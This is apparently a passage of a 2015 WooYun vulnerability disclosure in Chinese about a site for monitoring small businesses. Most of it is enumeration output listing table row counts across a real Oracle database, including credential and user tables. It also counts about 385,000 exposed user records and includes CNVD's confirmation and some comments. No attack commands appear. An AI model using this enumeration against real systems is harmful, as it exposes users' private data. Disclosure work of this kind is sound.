| MGMT_JOB_CALLBACKS             | 6       |
| MGMT_JOB_EXEC_SUMMARY          | 6       |
| MGMT_JOB_LOCK_INFO             | 6       |
| MGMT_JOB_LOCK_TARGETS          | 6       |
| MGMT_JOB_STATE_CHANGES         | 6       |
| MGMT_NOTIFY_FORMAT_HANDLERS    | 6       |
| MGMT_PAF_PARAM_GROUPS          | 6       |
| MGMT_TARGET_ASSOCS             | 6       |
| MGMT_ALL_TARGET_PROPS          | 5       |
| MGMT_AVAILABILITY_MARKER       | 5       |
| MGMT_BLACKOUT_PROXY_TARGETS    | 5       |
| MGMT_CURRENT_AVAILABILITY      | 5       |
| MGMT_ECM_GEN_SNAPSHOT          | 5       |
| MGMT_JOB                       | 5       |
| MGMT_RT_BOOTSTRAP_TIMES        | 5       |
| MGMT_TARGET_TYPE_COMPONENT_MAP | 5       |
| MGMT_TARGETS                   | 5       |
| MGMT_VERSIONS                  | 5       |
| EM_PAGE_CUST_METADATA          | 4       |
| MGMT_CREATED_USERS             | 4       |
| MGMT_ECM_SNAP_COMPONENT_INFO   | 4       |
| MGMT_FAILOVER_CALLBACKS        | 4       |
| MGMT_JOB_PARAMETER             | 4       |
| MGMT_JOB_PURGE_POLICIES        | 4       |
| MGMT_PAF_JOBTYPES              | 4       |
| MGMT_TARGET_ASSOC_ERROR        | 4       |
| MGMT_TARGET_ASSOC_STATUS       | 4       |
| MGMT_USER_CONTEXT              | 4       |
| MGMT_CREDENTIAL_TYPE_COL_VALS  | 3       |
| MGMT_CREDENTIALS2              | 3       |
| MGMT_CS_CONFIG_STANDARD        | 3       |
| MGMT_CS_KEYWORD                | 3       |
| MGMT_CURRENT_METRIC_ERRORS     | 3       |
| MGMT_FBP_PATCHING_GUIDS        | 3       |
| MGMT_FLAT_TARGET_ASSOC         | 3       |
| MGMT_INV_CONTAINER_PROPERTY    | 3       |
| MGMT_JOB_COMMAND_BLOCK_PROCS   | 3       |
| MGMT_JOB_PURGE_CRITERIA        | 3       |
| MGMT_JOB_PURGE_VALUES          | 3       |
| MGMT_JOB_SCHEDULE              | 3       |
| MGMT_NOTIFY_PROFILES           | 3       |
| MGMT_PDP_COLUMN_METADATA       | 3       |
| MGMT_PDP_SETTING_METADATA      | 3       |
| MGMT_SWLIB_MATURITY_STATUS     | 3       |
| MGMT_SYSTEM_ERROR_LOG          | 3       |
| AQ$_MGMT_LOADER_QTABLE_S       | 2       |
| AQ$_MGMT_NOTIFY_QTABLE_S       | 2       |
| MGMT_CATEGORY_CLASSES          | 2       |
| MGMT_CORRECTIVE_ACTION         | 2       |
| MGMT_HC_FS_MOUNT_DETAILS       | 2       |
| MGMT_INV_CONTAINER             | 2       |
| MGMT_INV_SUMMARY               | 2       |
| MGMT_JOB_LARGE_PARAMS          | 2       |
| MGMT_LOGIN_ASSISTANTS          | 2       |
| MGMT_PAF_COMP_JOBTYPE_MAPPINGS | 2       |
| MGMT_PDP_METADATA              | 2       |
| MGMT_SWLIB_ENTITY_REFERENCES   | 2       |
| MGMT_TASK_WORKER_COUNTS        | 2       |
| MGMT_USER_CAS                  | 2       |
| MGMT_AGENT_SEC_INFO            | 1       |
| MGMT_AUDIT_DESTINATION         | 1       |
| MGMT_AUDIT_MASTER              | 1       |
| MGMT_DB_HDM_METRIC_HELPER      | 1       |
| MGMT_DB_RECTSSETTINGS_ECM      | 1       |
| MGMT_DB_RECUSERSETTINGS_ECM    | 1       |
| MGMT_DEPLOYMENT_SECTIONS       | 1       |
| MGMT_ECM_CSA_OUT_OF_BOX        | 1       |
| MGMT_ECM_SNAPSHOT              | 1       |
| MGMT_EMD_PING                  | 1       |
| MGMT_EMD_PING_CHECK            | 1       |
| MGMT_HA_MTTR                   | 1       |
| MGMT_HC_HARDWARE_MASTER        | 1       |
| MGMT_HC_IOCARD_DETAILS         | 1       |
| MGMT_HC_NIC_DETAILS            | 1       |
| MGMT_HC_OS_SUMMARY             | 1       |
| MGMT_HC_SYSTEM_SUMMARY         | 1       |
| MGMT_HTTP_SESSION_CALLBACKS    | 1       |
| MGMT_JOB_EVENT                 | 1       |
| MGMT_LAST_SYNC_LOAD_DETAILS    | 1       |
| MGMT_LICENSE_CONFIRMATION      | 1       |
| MGMT_MASTER_CHANGED_CALLBACK   | 1       |
| MGMT_NOTIFY_JOB_RULE_CONFIGS   | 1       |
| MGMT_REBUILD_INDEXES           | 1       |
| MGMT_ROLE_GRANTS               | 1       |
| MGMT_ROLES                     | 1       |
| MGMT_SEC_INFO                  | 1       |
| MGMT_SPACE_METRICS             | 1       |
| MGMT_SWLIB_DATA_DIRECTORIES    | 1       |
| MGMT_TARGET_CREDENTIALS        | 1       |
| MGMT_VIEW_USER_CREDENTIALS     | 1       |
+--------------------------------+---------+
Database: EC
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| EC_COUNT                       | 87238   |
| PROD_CLASS                     | 7200    |
| WEB_PROD_CLASS                 | 7200    |
| PROD_IMG                       | 6869    |
| PRODUCT                        | 6554    |
| COMPANY                        | 6513    |
| EXPO_COMP                      | 5418    |
| EXPO_PROD                      | 4497    |
| EC_ERR                         | 2483    |
| COMP_IMG                       | 1955    |
| EXPO_PIC                       | 1674    |
| EXPO_NEWS                      | 760     |
| EXPO_INFO                      | 559     |
| NEGOTIATION                    | 491     |
| AUCTION_PRODUCT                | 443     |
| PROD_TYPE_THIRD                | 364     |
| AUCTION                        | 309     |
| COMP_INTR                      | 261     |
| EC_REP                         | 132     |
| AUCTION_PRODUCT_ATTACH         | 107     |
| TRADE_CODE                     | 100     |
| QD_REP                         | 93      |
| PROD_TYPE                      | 91      |
| EXPO                           | 89      |
| EXPO_COUNT                     | 86      |
| EXPO_TOPIC                     | 68      |
| BID_LIST                       | 66      |
| PM_IDENTIFY                    | 65      |
| EXPO_NEWS_IMG                  | 58      |
| CHANCE_IMG                     | 35      |
| CHANCE                         | 33      |
| SYS_USER_FUN                   | 20      |
| TRADE_CODE_MAIN                | 20      |
| LEAVE_WORD                     | 17      |
| EXPO_ZL                        | 15      |
| PROD_TYPE_MAIN                 | 12      |
| SYS_FUN                        | 10      |
| TUI_PRODUCT                    | 10      |
| TUI_COMPANY                    | 9       |
| ACCEPT_ADDRESS                 | 5       |
| EXPO_IMAGE                     | 3       |
| SUPPLY                         | 2       |
| SYS_ADMIN                      | 2       |
| COMP_WIN                       | 1       |
| PM_COUNT                       | 1       |
| WEB_SYSTEM                     | 1       |
+--------------------------------+---------+
Database: EXFSYS
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| RLM$VALIDPRIVS                 | 17      |
| EXF$VALIDIOPER                 | 16      |
| RLM$RULESETSTCODE              | 8       |
| EXF$VALIDPRIVS                 | 3       |
| EXF$PARAMETER                  | 2       |
| EXF$VERSION                    | 1       |
+--------------------------------+---------+
Database: ORDDATA
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| ORDDCM_DICT_ATTRS              | 2418    |
| ORDDCM_STD_ATTRS               | 2415    |
| ORDDCM_UID_DEFS                | 245     |
| ORDDCM_CT_LOCATORPATHS         | 95      |
| ORDDCM_CT_DAREFS               | 74      |
| ORDDCM_CT_PRED                 | 61      |
| ORDDCM_CT_PRED_OPRD            | 51      |
| ORDDCM_INTERNAL_TAGS           | 42      |
| ORDDCM_ANON_ATTRS              | 37      |
| ORDDCM_VR_DT_MAP               | 32      |
| ORDDCM_PREFS_LOOKUP            | 13      |
| ORDDCM_RT_PREF_PARAMS          | 13      |
| ORDDCM_CT_PRED_SET             | 9       |
| ORDDCM_DOCS                    | 9       |
| ORDDCM_INSTALL_DOCS            | 9       |
| ORDDCM_DOC_TYPES               | 8       |
| ORDDCM_CT_ACTION               | 7       |
| ORDDCM_DOC_REFS                | 7       |
| ORDDCM_ANON_ACTION_TYPES       | 4       |
| ORDDCM_ANON_RULE_TYPES         | 3       |
| ORDDCM_ANON_RULES              | 3       |
| ORDDCM_CT_PRED_PAR             | 3       |
| ORDDCM_PRV_ATTRS               | 3       |
| ORDDCM_CT_MACRO_PAR            | 2       |
| ORDDCM_CT_MACRO_DEP            | 1       |
| ORDDCM_DATA_MODEL              | 1       |
| ORDDCM_MAPPING_DOCS            | 1       |
+--------------------------------+---------+
Database: NETFAIR
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| VOTE                           | 274663  |
| EXPO_PRODUCT                   | 14980   |
| PROD_CLASS                     | 7201    |
| EXPO_USER                      | 7182    |
| SPECIAL_CHANNEL                | 5629    |
| ZIPCODE_NEW                    | 3553    |
| ZIPCODE20101231                | 3520    |
| ZIPCODE                        | 2847    |
| EXPO_ORG_INFO                  | 2297    |
| TEMP_A                         | 1840    |
| SICCODE_NEW                    | 1632    |
| SICCODE                        | 1424    |
| ORG_INDUSTRY                   | 1418    |
| EXPO_COUNT_DAY                 | 1317    |
| BROWSE_NUM_DAY                 | 1144    |
| SHOP_INFO                      | 828     |
| HOTKEY                         | 298     |
| LEAVEWORD                      | 175     |
| SUPPLY                         | 137     |
| RECOMMEND_PRODUCT              | 131     |
| RECOMMEND_ORG                  | 96      |
| TEMP_B                         | 77      |
| CHANNEL_INFO                   | 35      |
| EXPO_AD                        | 35      |
| TEMP_C                         | 34      |
| HOTKEYTOP                      | 20      |
| IDENTIFY_PROD_CODE             | 15      |
| SHOW_CHANNEL                   | 12      |
| CHANNEL                        | 11      |
| IDENTIFY_PROD                  | 10      |
| RECOMMEND                      | 10      |
| AUCTION                        | 8       |
| ORDER_DETAIL                   | 8       |
| ORDER_INFO                     | 7       |
| USER_ADMIN_AREA                | 6       |
| PROD_ATT                       | 5       |
| PROD_ATT_CODE                  | 5       |
| SPECIAL_PROD                   | 5       |
| CHANNEL_INFO_OWNER             | 3       |
| ADDRESS                        | 2       |
| CREDIT                         | 2       |
| EXPO_YQLJ                      | 2       |
| BROWSE_NUM                     | 1       |
| EXPO_COMMENT                   | 1       |
| EXPO_COUNT                     | 1       |
+--------------------------------+---------+
Database: SYSTEM
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| HELP                           | 919     |
| LOGSTDBY$SKIP_SUPPORT          | 135     |
| MVIEW$_ADV_PARAMETERS          | 40      |
| AQ$_QUEUES                     | 36      |
| REPCAT$_OBJECT_TYPES           | 28      |
| AQ$_QUEUE_TABLES               | 19      |
| REPCAT$_RESOLUTION_METHOD      | 19      |
| AQ$_INTERNET_AGENTS            | 5       |
| AQ$_INTERNET_AGENT_PRIVS       | 4       |
| REPCAT$_TEMPLATE_STATUS        | 3       |
| REPCAT$_AUDIT_ATTRIBUTE        | 2       |
| REPCAT$_TEMPLATE_TYPES         | 2       |
+--------------------------------+---------+
Database: SYS
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| AW$AWMD                        | 728     |
| STMT_AUDIT_OPTION_MAP          | 268     |
| SYSTEM_PRIVILEGE_MAP           | 208     |
| AUDIT_ACTIONS                  | 177     |
| AW$AWXML                       | 137     |
| AW$EXPRESS                     | 101     |
| AW$AWCREATE                    | 51      |
| AW$AWCREATE10G                 | 27      |
| AW$AWREPORT                    | 27      |
| TABLE_PRIVILEGE_MAP            | 26      |
| AUX_STATS$                     | 13      |
| "DUAL"                         | 1       |
+--------------------------------+---------+
Database: MDSYS
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| SDO_COORD_OP_PARAM_VALS        | 9736    |
| SDO_COORD_REF_SYS              | 4426    |
| SDO_CS_SRS                     | 4426    |
| SDO_COORD_OPS                  | 2279    |
| SDO_COORD_OP_PARAM_USE         | 718     |
| SDO_DATUMS                     | 535     |
| SDO_COORD_OP_PATHS             | 365     |
| SDO_COORD_OP_PARAMS            | 153     |
| SDO_COORD_AXES                 | 139     |
| SDO_UNITS_OF_MEASURE           | 132     |
| SDO_DATUMS_OLD_SNAPSHOT        | 118     |
| MD$RELATE                      | 96      |
| SDO_ELLIPSOIDS                 | 96      |
| SDO_CRS_GEOGRAPHIC_PLUS_HEIGHT | 95      |
| SDO_COORD_OP_METHODS           | 85      |
| SDO_STYLES_TABLE               | 78      |
| SDO_COORD_SYS                  | 65      |
| SDO_ELLIPSOIDS_OLD_SNAPSHOT    | 47      |
| SDO_PROJECTIONS_OLD_SNAPSHOT   | 42      |
| SDO_COORD_AXIS_NAMES           | 28      |
| OPENLS_CLASSIFICATIONS         | 22      |
| OPENLS_NODES                   | 17      |
| SDO_PRIME_MERIDIANS            | 16      |
| OPENLS_NAMESPACES              | 4       |
| OPENLSSERVICES                 | 4       |
| SDO_XML_SCHEMAS                | 3       |
| OLS_DIR_CATEGORY_TYPES         | 2       |
| SDO_GEOR_XMLSCHEMA_TABLE       | 1       |
+--------------------------------+---------+
Database: SCOTT
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| EMP                            | 14      |
| SALGRADE                       | 5       |
| DEPT                           | 4       |
+--------------------------------+---------+


既然是中小企业监控,数据应该不少,来看看用户数有多少

user1.png


user2.png


user3.png


user4.png


恕我数学没学好,掏出我的计算器,385453,近40W用户信息

用户总数.png


随便看个用户表

用户表.png


最后我看了看简要描述中提到的几个大字,手抽的点了下,100分,我图都截好了,你TM在逗我?

100分.png


再看看评论,我就呵呵,提交漏洞至乌云

评论.png


最后申明下,整个过程未脱库,日志可查。

修复方案:

版权声明:转载请注明来源 Looke@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-09 17:46

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向国家上级信息安全协调机构上报,由其后续协调网站管理单位处置.

最新状态:

暂无

漏洞评价:

评价

  1. 2015-12-05 20:52 | 高小厨 认证白帽子 ( 普通白帽子 | Rank:882 漏洞数:80 | 不会吹牛的小二不是好厨子!)

    经检测100分,铜墙铁壁,不怕入侵了,羡慕~~~

  2. 2015-12-05 23:47 | Mark0smith ( 实习白帽子 | Rank:99 漏洞数:36 )

    66666